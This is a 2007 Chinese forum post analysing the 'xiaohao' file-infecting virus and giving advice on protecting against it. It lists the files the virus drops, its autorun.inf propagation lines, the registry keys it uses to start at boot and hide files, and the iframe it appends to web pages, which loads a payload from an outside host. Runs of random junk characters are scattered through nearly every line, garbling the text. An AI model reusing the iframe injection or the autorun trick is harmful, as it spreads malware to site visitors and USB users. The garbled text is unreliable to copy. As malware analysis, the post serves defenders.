|
|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
% c( T& Z' P& S- M& z5 |* cSize: 12288 bytes
. D, [2 A4 J" s2 l# _File Version: 1, 0, 0, 19 ?4 c' G% Z; m. m" }" t3 k
Modified: 2007年8月14日, 21:03:220 U& x% w. \* s! c: Y8 h
MD5: B50ED06B61CDCF060D0136784999E50C& D6 X1 u. Q/ ]* r( l/ B# o+ u8 l
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
' `% j' d$ e3 D QCRC32: 5CC1E47A
2 p/ \8 `: i# O, M: C加壳方式:UPX
- S/ x- G$ ~( q0 K病毒运行后:$ i' {; F3 b, K
1.生成如下文件:+ x. J6 j3 }% a" r8 U5 i
%SystemRoot%\system32\exloroe.exe
7 a* x* N0 H0 K- k% k每个分区下生成一个xiaohao.exe 和autorun.inf# J- u+ p8 y* G/ }0 o: K2 X
autorun.inf内容
: ?% ?) S5 w; Q6 O[Autorun]' B/ {) H5 \1 b- Z1 i
open=Xiaohao.exe
2 N9 j5 V U" U& Y3 Jshellexecute=Xiaohao.exe
$ g& ?/ [# I+ D/ K1 J. R( v8 @! Ushell\Auto\command=Xiaohao.exe
; d: ]( Q8 i- n0 ^. }8 Z2.添加注册表项目: V' S1 s* h) u# V1 b6 H
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
/ i9 m( p4 \+ J指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的
/ @2 V& t p, ~/ ~+ S9 p& K, r3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000
0 ~+ Q$ n5 i5 S: |+ A0 x! O破坏显示隐藏文件
3 q/ t3 x( j5 o# l& @删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2
4 R/ d3 p* c) M4 h6 u3 ^4 V! ^从而删除开始菜单中所有的快捷方式$ o u; H1 Q, j6 ~; D' T$ n
4.感染文件
, K) r1 l7 `* o* {8 P7 |# c: o; U0 C从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的+ I1 C& y3 U9 M) F
exe无法修复2 n8 v+ P$ I' { V+ ^% l9 c3 |! h
从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码5 H- _' Q- M2 Y
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
7 |+ d7 W/ |) N$ |7 S t: M所有感染的文件的文件名记录在C:\Jilu.txt里面
6 o8 B) P q" u+ n0 Q并将所有未能感染的文件属性变为隐藏% O+ q$ J$ P. @' v+ K
5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”# U2 E$ u* h' t' u8 c5 T* n& {" X
6.系统时间改为2005年1月17日! }# ~; D' [8 n8 z5 ]
病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。
6 |, I0 ]; E+ H由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败
4 [) j% | h! @, U如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉7 d4 Z7 B) Z/ |
希望大家注意如下几点防范此类病毒
3 j) i4 N6 l6 u3 U% k5 L1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)
0 I' I3 B# \' b; q2.及时升级杀毒软件,防火墙,一定打全系统补丁
/ f7 |, @. X, p- ?5 `5 Q3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可 |
|
IP卡
狗仔卡
发表于 2007-9-16 09:33:42
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
楼主